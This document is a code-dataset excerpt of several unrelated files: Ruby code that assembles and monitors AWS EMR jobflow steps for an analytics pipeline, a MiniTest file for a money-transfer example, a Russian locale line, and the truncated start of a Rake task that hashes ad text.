# Late check whether our target directory is empty
unless empty?(s3, csbs[:good])
raise DirectoryNotEmptyError, "Cannot safely add shredding step to jobflow, #{csbs[:good]} is not empty"
end
shred_step_config = {:step => shred_step, :retry_on_fail => false, :rdb_loader_log => nil}
submit_jobflow_step(shred_step_config, use_persistent_jobflow)
# We need to copy our shredded types from HDFS back to S3
# Whether to combine the files outputted by the shred step
consolidate_shredded_output = config[:aws][:s3][:consolidate_shredded_output]
if consolidate_shredded_output
copy_atomic_events_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_atomic_events_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--groupBy" , ATOMIC_EVENTS_PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_atomic_events_to_s3_step.arguments = copy_atomic_events_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_atomic_events_to_s3_step.name = "[shred] s3-dist-cp: Shredded atomic events HDFS -> S3"
copy_atomic_events_to_s3_step_config = {:step => copy_atomic_events_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_atomic_events_to_s3_step_config, use_persistent_jobflow)
# Copy shredded JSONs (if shredder version < 0.16.0 or >= 0.16.0 and tabularBlacklist non empty)
if should_copy_shredded_JSONs(shredder_version, SHRED_JOB_WITH_TSV_OUTPUT, targets[:ENRICHED_EVENTS])
copy_shredded_types_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_shredded_types_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--groupBy" , SHREDDED_TYPES_PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_shredded_types_to_s3_step.arguments = copy_shredded_types_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_shredded_types_to_s3_step.name = "[shred] s3-dist-cp: Shredded JSON types HDFS -> S3"
copy_shredded_types_to_s3_step_config = {:step => copy_shredded_types_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_shredded_types_to_s3_step_config, use_persistent_jobflow)
end
# Copy shredded TSVs (if shredder version >= 0.16.0 and tabularBlacklist exists and is an array)
if should_copy_shredded_TSVs(shredder_version, SHRED_JOB_WITH_TSV_OUTPUT, targets[:ENRICHED_EVENTS])
copy_shredded_tsv_types_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_shredded_tsv_types_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--groupBy" , SHREDDED_TSV_TYPES_PARTFILE_GROUPBY_REGEXP,
"--targetSize", "24",
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_shredded_tsv_types_to_s3_step.arguments = copy_shredded_tsv_types_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_shredded_tsv_types_to_s3_step.name = "[shred] s3-dist-cp: Shredded TSV types HDFS -> S3"
copy_shredded_tsv_types_to_s3_step_config = {:step => copy_shredded_tsv_types_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_shredded_tsv_types_to_s3_step_config, use_persistent_jobflow)
end
else
copy_to_s3_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_to_s3_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--srcPattern", PARTFILE_REGEXP,
"--s3Endpoint", s3_endpoint
] + output_codec
if encrypted
copy_to_s3_step.arguments = copy_to_s3_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_to_s3_step.name = "[shred] s3-dist-cp: Shredded HDFS -> S3"
copy_to_s3_step_config = {:step => copy_to_s3_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_to_s3_step_config, use_persistent_jobflow)
end
copy_success_file_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
copy_success_file_step.arguments = [
"--src" , SHRED_STEP_OUTPUT,
"--dest" , shred_final_output,
"--srcPattern" , SUCCESS_REGEXP,
"--s3Endpoint" , s3_endpoint
]
if encrypted
copy_success_file_step.arguments = copy_success_file_step.arguments + [ '--s3ServerSideEncryption' ]
end
copy_success_file_step.name = "[shred] s3-dist-cp: Shredded HDFS _SUCCESS -> S3"
copy_success_file_step_config = {:step => copy_success_file_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(copy_success_file_step_config, use_persistent_jobflow)
end
if es
get_elasticsearch_steps(config, assets, enrich, shred, targets[:FAILED_EVENTS]).each do |step|
submit_jobflow_step(step, use_persistent_jobflow)
end
end
if archive_raw
# We need to copy our enriched events from HDFS back to S3
archive_raw_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
archive_raw_step.arguments = [
"--src" , csbr[:processing],
"--dest" , partition_by_run(csbr[:archive], run_id),
"--s3Endpoint" , s3_endpoint,
"--deleteOnSuccess"
]
if encrypted
archive_raw_step.arguments = archive_raw_step.arguments + [ '--s3ServerSideEncryption' ]
end
archive_raw_step.name = "[archive_raw] s3-dist-cp: Raw Staging S3 -> Raw Archive S3"
archive_raw_step_config = {:step => archive_raw_step, :retry_on_fail => true, :rdb_loader_log => nil}
submit_jobflow_step(archive_raw_step_config, use_persistent_jobflow)
end
if rdb_load
rdb_loader_version = Gem::Version.new(config[:storage][:versions][:rdb_loader])
skip_manifest = stream_enrich_mode && rdb_loader_version > RDB_LOADER_WITH_PROCESSING_MANIFEST
get_rdb_loader_steps(config, targets[:ENRICHED_EVENTS], resolver, assets[:loader], rdbloader_steps, skip_manifest).each do |step|
submit_jobflow_step(step, use_persistent_jobflow)
end
end
if archive_enriched == 'pipeline'
archive_enriched_step = get_archive_step(csbe[:good], csbe[:archive], run_id, s3_endpoint, "[archive_enriched] s3-dist-cp: Enriched S3 -> Enriched Archive S3", encrypted)
submit_jobflow_step(archive_enriched_step, use_persistent_jobflow)
elsif archive_enriched == 'recover'
latest_run_id = get_latest_run_id(s3, csbe[:good])
archive_enriched_step = get_archive_step(csbe[:good], csbe[:archive], latest_run_id, s3_endpoint, '[archive_enriched] s3-dist-cp: Enriched S3 -> S3 Enriched Archive', encrypted)
submit_jobflow_step(archive_enriched_step, use_persistent_jobflow)
else # skip
nil
end
if archive_shredded == 'pipeline'
archive_shredded_step = get_archive_step(csbs[:good], csbs[:archive], run_id, s3_endpoint, "[archive_shredded] s3-dist-cp: Shredded S3 -> Shredded Archive S3", encrypted)
submit_jobflow_step(archive_shredded_step, use_persistent_jobflow)
elsif archive_shredded == 'recover'
latest_run_id = get_latest_run_id(s3, csbs[:good], 'atomic-events')
archive_shredded_step = get_archive_step(csbs[:good], csbs[:archive], latest_run_id, s3_endpoint, "[archive_shredded] s3-dist-cp: Shredded S3 -> S3 Shredded Archive", encrypted)
submit_jobflow_step(archive_shredded_step, use_persistent_jobflow)
else # skip
nil
end
self
end
# Create one step for each Elasticsearch target for each source for that target
#
Contract ConfigHash, Hash, Bool, Bool, ArrayOf[Iglu::SelfDescribingJson] => ArrayOf[EmrStepConfig]
def get_elasticsearch_steps(config, assets, enrich, shred, failure_storages)
# The default sources are the enriched and shredded errors generated for this run
sources = []
sources << partition_by_run(config[:aws][:s3][:buckets][:enriched][:bad], @run_id) if enrich
sources << partition_by_run(config[:aws][:s3][:buckets][:shredded][:bad], @run_id) if shred
steps = failure_storages.flat_map { |target|
sources.map { |source|
step = Elasticity::ScaldingStep.new(
assets[:elasticsearch],
"com.snowplowanalytics.snowplow.storage.hadoop.ElasticsearchJob",
({
:input => source,
:host => target.data[:host],
:port => target.data[:port].to_s,
:index => target.data[:index],
:type => target.data[:type],
:es_nodes_wan_only => target.data[:nodesWanOnly] ? "true" : "false"
}).reject { |k, v| v.nil? }
)
step.name = "Errors in #{source} -> Elasticsearch: #{target.data[:name]}"
{:step => step, :retry_on_fail => false, :rdb_loader_log => nil}
}
}
# Wait 60 seconds before starting the first step so S3 can become consistent
if (enrich || shred) && steps.any?
steps[0][:step].arguments << '--delay' << '60'
end
steps
end
# Run (and wait for) the daily ETL job.
#
# Throws a BootstrapFailureError if the job fails due to a bootstrap failure.
# Throws an EmrExecutionError if the jobflow fails for any other reason.
Contract ConfigHash => nil
def run(config)
if @use_persistent_jobflow
manage_lifecycle_persistent {
run_persistent_mode(config)
}
else
run_transient_mode(config)
end
end
# This is the original EER run mode.
# All steps are added at once and the jobflow is left to either succeed or fail
Contract ConfigHash => nil
def run_transient_mode(config)
snowplow_tracking_enabled = ! config[:monitoring][:snowplow].nil?
if snowplow_tracking_enabled
Monitoring::Snowplow.parameterize(config)
end
@pending_jobflow_steps.each do |step_config|
add_step_to_jobflow(step_config[:step], snowplow_tracking_enabled)
end
jobflow_id = @jobflow.jobflow_id
if jobflow_id.nil?
retry_connection_issues {
jobflow_id = @jobflow.run
}
end
logger.debug "EMR jobflow #{jobflow_id} started, waiting for jobflow to complete..."
if snowplow_tracking_enabled
Monitoring::Snowplow.instance.track_job_started(jobflow_id, cluster_status(@jobflow), cluster_step_status_for_run(@jobflow, @run_tstamp))
end
job_result = wait_for(@run_tstamp)
output_rdb_loader_logs_for_batch(job_result, @pending_jobflow_steps, config, 0)
cluster_status = cluster_status(@jobflow)
cluster_step_status_for_run = cluster_step_status_for_run(@jobflow, @run_tstamp)
if snowplow_tracking_enabled
if job_result.successful
Monitoring::Snowplow.instance.track_job_succeeded(jobflow_id, cluster_status, cluster_step_status_for_run)
else
Monitoring::Snowplow.instance.track_job_failed(jobflow_id, cluster_status, cluster_step_status_for_run)
end
end
if job_result.bootstrap_failure
raise BootstrapFailureError, get_failure_details(jobflow_id, cluster_status, cluster_step_status_for_run)
elsif !job_result.successful
raise EmrExecutionError, get_failure_details(jobflow_id, cluster_status, cluster_step_status_for_run)
end
retry_connection_issues {
@jobflow.shutdown
}
nil
end
# This run mode is targeted at persistent clusters.
# Initially, all steps are submitted in one batch.
# If the batch fails, then it re-submits the subset of the batch that should be retried.
Contract ConfigHash => nil
def run_persistent_mode(config)
jobflow_id = @jobflow.jobflow_id
snowplow_tracking_enabled = ! config[:monitoring][:snowplow].nil?
if snowplow_tracking_enabled
Monitoring::Snowplow.parameterize(config)
end
# The batch comprises all steps for the first attempt.
batch = @pending_jobflow_steps
retries = 0
loop do
batch_tstamp = Time.new
batch.each do |step_config|
add_step_to_jobflow(step_config[:step], snowplow_tracking_enabled)
end
if snowplow_tracking_enabled
Monitoring::Snowplow.instance.track_job_started(jobflow_id, cluster_status(@jobflow), cluster_step_status_for_run(@jobflow, batch_tstamp))
end
job_result = wait_for(batch_tstamp)
output_rdb_loader_logs_for_batch(job_result, batch, config, retries)
cluster_status = cluster_status(@jobflow)
cluster_step_status_for_run = cluster_step_status_for_run(@jobflow, batch_tstamp)
if snowplow_tracking_enabled
if job_result.successful
Monitoring::Snowplow.instance.track_job_succeeded(jobflow_id, cluster_status, cluster_step_status_for_run)
else
Monitoring::Snowplow.instance.track_job_failed(jobflow_id, cluster_status, cluster_step_status_for_run)
end
end
if job_result.successful
break
end
failure_details = get_failure_details(jobflow_id, cluster_status, cluster_step_status_for_run)
if job_result.bootstrap_failure
raise BootstrapFailureError, failure_details
end
# There was a step failure! Retry the batch if we can
failed_step_status = cluster_step_status_for_run.detect { |s| s.state == 'FAILED' }
if failed_step_status.nil?
# This is unexpected: one of the steps must have failed
raise EmrExecutionError, failure_details
end
logger.debug "EMR step failed: #{failed_step_status.name}"
failed_step_config = batch.detect { |s| s[:step].name == failed_step_status.name }
if failed_step_config.nil? || !failed_step_config[:retry_on_fail]
# The step that failed is not one that can be retried
raise EmrExecutionError, failure_details
end
# The next batch is the subset of the previous batch, starting from the failed step
next_batch = batch.drop_while { |s| s[:step].name != failed_step_status.name }
# Increment the retries counter
# If the previous and next batches are different lengths, then we have not yet retried this particular jkstep. Therefore retries = 1.
retries = next_batch.length() == batch.length() ? retries + 1 : 1
if retries >= 3
raise EmrExecutionError, failure_details
end
batch = next_batch
logger.warn failure_details
logger.info "Failed and cancelled steps will be resubmitted"
end
nil
end
# This is for persistent clusters only.
# Ensures the cluster is running.
# If the cluster has expired then it ensures termination even if a EmrExecutionError is raised.
def manage_lifecycle_persistent
def terminate
cluster_status = cluster_status(@jobflow)
if @persistent_jobflow_duration_s > 0 and
cluster_status.created_at + @persistent_jobflow_duration_s < Time.new
logger.debug "EMR jobflow has expired and will be shutdown."
retry_connection_issues {
@jobflow.shutdown
}
end
end
if @jobflow.jobflow_id.nil?
retry_connection_issues {
@jobflow.run
}
end
logger.debug "EMR jobflow #{@jobflow.jobflow_id} started"
begin
yield
terminate
rescue EmrExecutionError => e
terminate rescue nil
raise e
end
end
Contract Elasticity::JobFlowStep, Bool => nil
def add_step_to_jobflow(jobflow_step, snowplow_tracking_enabled)
begin
retry_connection_issues {
# if the job flow is already running this triggers an HTTP call
@jobflow.add_step(jobflow_step)
}
rescue => e
# This exception has already been retried the maximum number of times
if snowplow_tracking_enabled
step_status = Elasticity::ClusterStepStatus.new
step_status.name = "Add step [#{jobflow_step.name}] to jobflow [#{@jobflow.jobflow_id}]. (Error: [#{e.message}])"
step_status.state = "FAILED"
Monitoring::Snowplow.instance.track_single_step(step_status)
end
raise EmrExecutionError, "Can't add step [#{jobflow_step.name}] to jobflow [#{@jobflow.jobflow_id}] (retried 3 times). Error: [#{e.message}]."
end
logger.debug "Added step to EMR jobflow: #{jobflow_step.name}"
nil
end
Contract JobResult, ArrayOf[EmrStepConfig], ConfigHash, Num => nil
def output_rdb_loader_logs_for_batch(job_result, batch, config, attempt)
if job_result.successful or job_result.rdb_loader_failure or job_result.rdb_loader_cancellation
log_level = if job_result.successful
'info'
elsif job_result.rdb_loader_cancellation
'warn'
else
'error'
end
rdb_loader_logs = batch.map {|s| s[:rdb_loader_log]}.compact
output_rdb_loader_logs(rdb_loader_logs, config[:aws][:s3][:region], config[:aws][:access_key_id],
config[:aws][:secret_access_key], log_level, attempt)
end
end
# Fetch logs from S3 left by RDB Loader steps
#
# Parameters:
# +region+:: region for logs bucket
Contract ArrayOf[[String, String]], String, String, String, String, Num => nil
def output_rdb_loader_logs(rdb_loader_logs, region, aws_access_key_id, aws_secret_key, log_level, attempt)
s3 = Aws::S3::Client.new(
:access_key_id => aws_access_key_id,
:secret_access_key => aws_secret_key,
:region => region)
if rdb_loader_logs.empty? or empty?(s3, @rdb_loader_log_base)
logger.info "No RDB Loader logs"
else
logger.info "RDB Loader logs"
rdb_loader_logs.each do |l|
tmp = Tempfile.new("rdbloader")
bucket, key = parse_bucket_prefix(l[1])
logger.debug "Downloading #{l[1]} to #{tmp.path}"
begin
s3.get_object({
response_target: tmp,
bucket: bucket,
key: key,
})
if log_level == 'info'
logger.info l[0]
logger.info tmp.read
elsif log_level == 'warn'
logger.warn l[0]
logger.warn tmp.read
else
logger.error l[0]
logger.error tmp.read
end
# Cannot move an object in S3, so copy and delete
# This prevents overwriting the original log file in case this step gets retried.
s3.copy_object({
bucket: bucket,
copy_source: "/#{bucket}/#{key}",
key: "#{key}.#{attempt}",
})
s3.delete_object({
bucket: bucket,
key: key,
})
rescue Exception => e
logger.error "Error while downloading RDB log #{l[1]}"
logger.error e.message
ensure
tmp.close
tmp.unlink
end
end
end
nil
end
private
# Adds a step to the jobflow according to whether or not
# we are using a persistent cluster.
#
# Parameters:
# +jobflow_step+:: the step to add
# +use_persistent_jobflow+:: whether a persistent jobflow should be used
Contract EmrStepConfig, Bool => nil
def submit_jobflow_step(jobflow_step, use_persistent_jobflow)
if use_persistent_jobflow
jobflow_step[:step].action_on_failure = "CANCEL_AND_WAIT"
end
@pending_jobflow_steps << jobflow_step
nil
end
# Build an Elasticity RDB Loader step.
#
# Parameters:
# +config+:: main Snowplow config.yml
# +targets+:: list of Storage target config hashes
# +resolver+:: base64-encoded Iglu resolver JSON
# +jar+:: s3 object with RDB Loader jar
# +skip_manifest+:: whether load_manifest RDB Loader step should be skipped
Contract ConfigHash, ArrayOf[Iglu::SelfDescribingJson], String, String, RdbLoaderSteps, Bool => ArrayOf[EmrStepConfig]
def get_rdb_loader_steps(config, targets, resolver, jar, rdbloader_steps, skip_manifest)
# Remove credentials from config
clean_config = deep_copy(config)
clean_config[:aws][:access_key_id] = ""
clean_config[:aws][:secret_access_key] = ""
default_arguments = {
:config => Base64.strict_encode64(recursive_stringify_keys(clean_config).to_yaml),
:resolver => build_iglu_config_json(resolver)
}
skip_steps = if skip_manifest then rdbloader_steps[:skip] + ["load_manifest"] else rdbloader_steps[:skip] end
targets.map { |target|
name = target.data[:name]
log_key = @rdb_loader_log_base + SecureRandom.uuid
encoded_target = Base64.strict_encode64(target.to_json.to_json)
arguments = [
"--config", default_arguments[:config],
"--resolver", default_arguments[:resolver],
"--logkey", log_key,
"--target", encoded_target
] + unless skip_steps.empty?
["--skip", skip_steps.join(",")]
else
[]
end + unless rdbloader_steps[:include].empty?
["--include", rdbloader_steps[:include].join(",")]
else
[]
end
rdb_loader_step = Elasticity::CustomJarStep.new(jar)
rdb_loader_step.arguments = arguments
rdb_loader_step.name = "[rdb_load] Load #{name} Storage Target"
rdb_loader_step
{:step => rdb_loader_step, :retry_on_fail => false, :rdb_loader_log => [name, log_key]}
}
end
# List bucket (enriched:good or shredded:good) and return latest run folder
#
# Parameters:
# +s3+:: AWS S3 client
# +s3_path+:: Full S3 path to folder
# +suffix+:: Suffix to check for emptiness, atomic-events in case of shredded:good
def get_latest_run_id(s3, s3_path, suffix = '')
run_id_regex = /.*\/run=((\d|-)+)\/.*/
folder = last_object_name(s3, s3_path,
lambda { |k| !(k =~ /\$folder\$$/) and !k[run_id_regex, 1].nil? })
run_id = folder[run_id_regex, 1]
if run_id.nil?
logger.error "No run folders in [#{s3_path}] found"
raise UnexpectedStateError, "No run folders in [#{s3_path}] found"
else
path = File.join(s3_path, "run=#{run_id}", suffix)
if empty?(s3, path)
raise NoDataToProcessError, "Cannot archive #{path}, no data found"
else
run_id
end
end
end
# Defines a S3DistCp step for archiving enriched or shred folder
#
# Parameters:
# +good_path+:: shredded:good or enriched:good full S3 path
# +archive_path+:: enriched:archive or shredded:archive full S3 path
# +run_id_folder+:: run id foler name (2017-05-10-02-45-30, without `=run`)
# +name+:: step description to show in EMR console
# +encrypted+:: whether the destination bucket is encrypted
#
# Returns a step ready for adding to the Elasticity Jobflow.
Contract String, String, String, String, String, Bool => EmrStepConfig
def get_archive_step(good_path, archive_path, run_id_folder, s3_endpoint, name, encrypted)
archive_step = Elasticity::S3DistCpStep.new(legacy = @legacy)
archive_step.arguments = [
"--src" , partition_by_run(good_path, run_id_folder),
"--dest" , partition_by_run(archive_path, run_id_folder),
"--s3Endpoint" , s3_endpoint,
"--deleteOnSuccess",
"--disableMultipartUpload"
]
if encrypted
archive_step.arguments = archive_step.arguments + [ '--s3ServerSideEncryption' ]
end
archive_step.name = name
{:step => archive_step, :retry_on_fail => true, :rdb_loader_log => nil}
end
# Defines an Elasticity Scalding step.
#
# Parameters:
# +step_name+:: name of step
# +main_class+:: Java main class to run
# +folders+:: hash of in, good, bad, errors S3/HDFS folders
# +extra_step_args+:: additional arguments to pass to the step
# +targets+:: list of targets parsed from self-describing JSONs
#
# Returns a step ready for adding to the Elasticity Jobflow.
Contract String, String, String, Hash, Hash => Elasticity::ScaldingStep
def build_scalding_step(step_name, jar, main_class, folders, extra_step_args={})
# Build our argument hash
arguments = extra_step_args
.merge({
:input_folder => folders[:in],
:output_folder => folders[:good],
:bad_rows_folder => folders[:bad],
:exceptions_folder => folders[:errors]
})
.reject { |k, v| v.nil? } # Because folders[:errors] may be empty
arguments['tool.partialok'] = ''
# Now create the Hadoop MR step for the jobflow
scalding_step = Elasticity::ScaldingStep.new(jar, "#{JAVA_PACKAGE}.#{main_class}", arguments)
scalding_step.name = step_name
scalding_step
end
# Defines an Elasticity Spark step.
#
# Parameters:
# +step_name+:: name of the step
# +main_class+:: class to run
# +folders+:: hash of input, output, bad S3/HDFS folders
# +extra_step_args+:: additional command line arguments to pass to the step
#
# Returns a step read to be added to the Elasticity Jobflow.
Contract String, String, String, Hash, Hash => Elasticity::SparkStep
def build_spark_step(step_name, jar, main_class, folders, extra_step_args={})
arguments = extra_step_args
.merge({
'input-folder' => folders[:in],
'output-folder' => folders[:good],
'bad-folder' => folders[:bad],
})
spark_step = Elasticity::SparkStep.new(jar, "#{JAVA_PACKAGE}.#{main_class}")
spark_step.app_arguments = arguments
spark_step.spark_arguments = {
'master' => 'yarn',
'deploy-mode' => 'cluster'
}
spark_step.name = step_name
spark_step
end
# Wait for a jobflow.
# Check its status every 5 minutes till it completes.
#
# Returns true if the jobflow completed without error,
# false otherwise.
Contract Time => JobResult
def wait_for(earliest)
success = false
bootstrap_failure = false
rdb_loader_failure = false
rdb_loader_cancellation = false
# Loop until we can quit...
while true do
cluster_step_status_for_run = cluster_step_status_for_run(@jobflow, earliest)
if cluster_step_status_for_run.nil?
logger.warn "Could not retrieve cluster status, waiting 5 minutes before checking jobflow again"
sleep(300)
else
# Count up running tasks and failures
statuses = cluster_step_status_for_run.map(&:state).inject([0, 0]) do |sum, state|
[ sum[0] + (@@running_states.include?(state) ? 1 : 0), sum[1] + (@@failed_states.include?(state) ? 1 : 0) ]
end
# If no step is still running, then quit
if statuses[0] == 0
success = statuses[1] == 0 # True if no failures
bootstrap_failure = EmrJob.bootstrap_failure?(@jobflow, cluster_step_status_for_run)
rdb_loader_failure = EmrJob.rdb_loader_failure?(cluster_step_status_for_run)
rdb_loader_cancellation = EmrJob.rdb_loader_cancellation?(cluster_step_status_for_run)
break
else
# Sleep a while before we check again
sleep(60)
end
end
end
JobResult.new(success, bootstrap_failure, rdb_loader_failure, rdb_loader_cancellation)
end
# Spaceship operator supporting nils
#
# Parameters:
# +a+:: First argument
# +b+:: Second argument
Contract Maybe[Time], Maybe[Time] => Num
def self.nilable_spaceship(a, b)
case
when (a.nil? and b.nil?)
0
when a.nil?
1
when b.nil?
-1
else
a <=> b
end
end
# Recursively change the keys of a YAML from symbols to strings
def recursive_stringify_keys(h)
if h.class == [].class
h.map {|key| recursive_stringify_keys(key)}
elsif h.class == {}.class
Hash[h.map {|k,v| [k.to_s, recursive_stringify_keys(v)]}]
else
h
end
end
def deep_copy(o)
Marshal.load(Marshal.dump(o))
end
# Ensures we only look at the steps submitted in this run
# and not within prior persistent runs
#
# Parameters:
# +jobflow+:: The jobflow to extract steps from
Contract Elasticity::JobFlow, Time => ArrayOf[Elasticity::ClusterStepStatus]
def cluster_step_status_for_run(jobflow, earliest)
retry_connection_issues {
jobflow.cluster_step_status
.select { |a| a.created_at >= earliest }
.sort_by { |a| a.created_at }
}
end
Contract Elasticity::JobFlow => Elasticity::ClusterStatus
def cluster_status(jobflow)
retry_connection_issues {
jobflow.cluster_status
}
end
# Returns true if the jobflow failed at a rdb loader step
Contract ArrayOf[Elasticity::ClusterStepStatus] => Bool
def self.rdb_loader_failure?(cluster_step_statuses)
rdb_loader_failure_indicator = /Storage Target/
cluster_step_statuses.any? { |s| s.state == 'FAILED' && !(s.name =~ rdb_loader_failure_indicator).nil? }
end
# Returns true if the rdb loader step was cancelled
Contract ArrayOf[Elasticity::ClusterStepStatus] => Bool
def self.rdb_loader_cancellation?(cluster_step_statuses)
rdb_loader_failure_indicator = /Storage Target/
cluster_step_statuses.any? { |s| s.state == 'CANCELLED' && !(s.name =~ rdb_loader_failure_indicator).nil? }
end
# Returns true if the jobflow seems to have failed due to a bootstrap failure
Contract Elasticity::JobFlow, ArrayOf[Elasticity::ClusterStepStatus] => Bool
def self.bootstrap_failure?(jobflow, cluster_step_statuses)
bootstrap_failure_indicator = /BOOTSTRAP_FAILURE|bootstrap action|Master instance startup failed/
cluster_step_statuses.all? { |s| s.state == 'CANCELLED' } &&
(!(jobflow.cluster_status.last_state_change_reason =~ bootstrap_failure_indicator).nil?)
end
Contract ArrayOf[String], String, String => EmrStepConfig
def get_rmr_step(locations, bucket, description)
step = Elasticity::CustomJarStep.new("s3://#{@jobflow.region}.elasticmapreduce/libs/script-runner/script-runner.jar")
step.arguments = ["#{bucket}common/emr/snowplow-hadoop-fs-rmr-0.2.0.sh"] + locations
step.name = "[cleanup] #{description}"
{:step => step, :retry_on_fail => true, :rdb_loader_log => nil}
end
def get_hdfs_expunge_step
step = Elasticity::CustomJarStep.new("command-runner.jar")
step.arguments = %W(hdfs dfs -expunge)
step.name = "[cleanup] Empty HDFS trash"
{:step => step, :retry_on_fail => true, :rdb_loader_log => nil}
end
Contract TargetsHash => Maybe[String]
def get_processing_manifest(targets)
targets[:ENRICHED_EVENTS].select { |t| not t.data[:processingManifest].nil? }.map { |t| t.data.dig(:processingManifest, :amazonDynamoDb, :tableName) }.first
end
Contract ConfigHash, ArrayOf[Iglu::SelfDescribingJson] => Hash
def get_rdb_shredder_target(config, targets)
supported_targets = targets.select { |target_config|
target_config.schema.name == 'redshift_config' && target_config.schema.version.model >= 4
}
if Gem::Version.new(config[:storage][:versions][:rdb_shredder]) >= SHRED_JOB_WITH_TSV_OUTPUT && !supported_targets.empty?
{ 'target' => Base64.strict_encode64(supported_targets.first.to_json.to_json) }
else
{}
end
end
end
end
end
| 43.804614 | 253 | 0.620225 |
38b058a3c88d137b80cf250d1d9784b3f28b3755 | 777 | require 'test_helper'
require_relative '../examples/money_transfer'
class TransferMoneyTest < MiniTest::Test
def setup
@account1= Account['A1', 50]
@account2 = Account['B2', 100]
end
def test_deposit
TransferMoney[to: @account1].deposit(10)
assert_equal 60, @account1.balance
end
def test_withdraw
TransferMoney[from: @account1].withdraw(10)
assert_equal 40, @account1.balance
end
def test_withdraw_above_balance
error = assert_raises(NotEnoughFund) { TransferMoney[from: @account1].withdraw(60) }
assert_equal "Balance is below amount.", error.message
end
def test_call
TransferMoney[from: @account1, to: @account2].(amount: 50)
assert_equal 0, @account1.balance
assert_equal 150, @account2.balance
end
end
| 25.064516 | 88 | 0.725869 |
61c2fd2abe6e9da49dac53a2e6980d91925f37d1 | 37 | desc_ru=Сервер баз данных PostgreSQL
| 18.5 | 36 | 0.864865 |
e2cb6e5d809a72151c4346f281473c5470b49e0d | 5,642 | require 'digest'
# gotta make sure that `clean_text` is the same for ads from both sources. that's the whole point. see below for examples for checking.
# Ad.where("text ilike '%Charlotte on%'").first.text
# => "Let's get organized! Team Warren will convene a volunteer training in Charlotte on Tuesday, October 1. \n\nJoin us to learn more about how to spread Elizabeth’s vision for big, structural change."
# irb(main):022:0> FbpacAd.where("message ilike '%Charlotte on%'").where(advertiser: "Elizabeth Warren").first.message
# => "<p>Let's get organized! Team Warren will convene a volunteer training in Charlotte on Tuesday, October 1. </p><p> Join us to learn more about how to spread Elizabeth’s vision for big, structural change.</p>"
# irb(main):023:0> FbpacAd.where("message ilike '%Charlotte on%'").where(advertiser: "Elizabeth Warren").first.clean_text
# => "lets get organized team warren will convene a volunteer training in charlotte on tuesday october 1 join us to learn more about how to spread elizabeths vision for big structural change"
# irb(main):024:0> Ad.where("text ilike '%Charlotte on%'").first.clean_text
# => "lets get organized team warren will convene a volunteer training in charlotte on tuesday october 1 join us to learn more about how to spread elizabeths vision for big structural change"
# wilderness project, UNICEF, etc.
BORING_ADVERTISERS = [73970658023, 54684090291, 81517275796, 33110852384, 15239367801, 11131463701]
namespace :text do
task clear: :environment do
WritableAd.update_all(text_hash: nil)
end
task ads: :environment do
start = Time.now
def top_advertiser_page_ids
most_recent_lifelong_report_id = AdArchiveReport.where(kind: 'lifelong', loaded: true).order(:scrape_date).last.id
starting_point_id = AdArchiveReport.starting_point.id
top_advertiser_page_ids = ActiveRecord::Base.connection.exec_query("select start.page_id, start.page_name, current_sum_amount_spent - start_sum_amount_spent from
(SELECT ad_archive_report_pages.page_id as page_id,
ad_archive_report_pages.page_name,
sum(amount_spent) current_sum_amount_spent
FROM ad_archive_report_pages
WHERE ad_archive_report_pages.ad_archive_report_id = #{most_recent_lifelong_report_id}
GROUP BY page_id, page_name) current JOIN (SELECT ad_archive_report_pages.page_id as page_id,
ad_archive_report_pages.page_name,
sum(amount_spent) start_sum_amount_spent
FROM ad_archive_report_pages
WHERE ad_archive_report_pages.ad_archive_report_id = #{starting_point_id}
GROUP BY page_id, page_name) start on start.page_id = current.page_id order by current_sum_amount_spent - start_sum_amount_spent desc limit 10 "
).rows.map(&:first)
top_advertiser_page_ids - BORING_ADVERTISERS
end
new_ads = Ad.left_outer_joins(:writable_ad).where(writable_ads: {archive_id: nil}). # ads that don't have a writable ad or whose writable ad doesn't have a text hash in it
# where(page_id: top_advertiser_page_ids) # FOR NOW, limited to the top handful of advertisers
where("ad_creation_time > now() - interval '7 days'")
ads_without_text_hash = WritableAd.where("text_hash is null and archive_id is not null")
ads_hashed = 0
batch_size = 5000
new_ads.find_in_batches(batch_size: batch_size).map do |batch|
puts "batch (new ads)"
batch.map(&:create_writable_ad!).each do |wad|
wad.ad_text = wad.ad&.create_ad_text!(wad)
wad.save
ads_hashed += 1
end
end
ads_without_text_hash.find_in_batches(batch_size: batch_size).each do |batch|
puts "batch (ads w/o text hash)"
batch.each do |wad|
wad.ad_text = wad.ad.create_ad_text!(wad)
wad.save
ads_hashed += 1
end
end
job = Job.find_by(name: "text:ads")
job_run = job.job_runs.create({
start_time: start,
end_time: Time.now,
success: true,
})
# RestClient.post(
# ENV["SLACKWH"],
# JSON.dump({"text" => "(4/6): text hashing for FB API ads went swimmingly. (#{ads_hashed} ads hashed)" }),
# {:content_type => "application/json"}
# ) if ads_hashed > 0 && ENV["SLACKWH"]
end
task fbpac_ads: ["page_ids:fbpac_ads", :environment] do
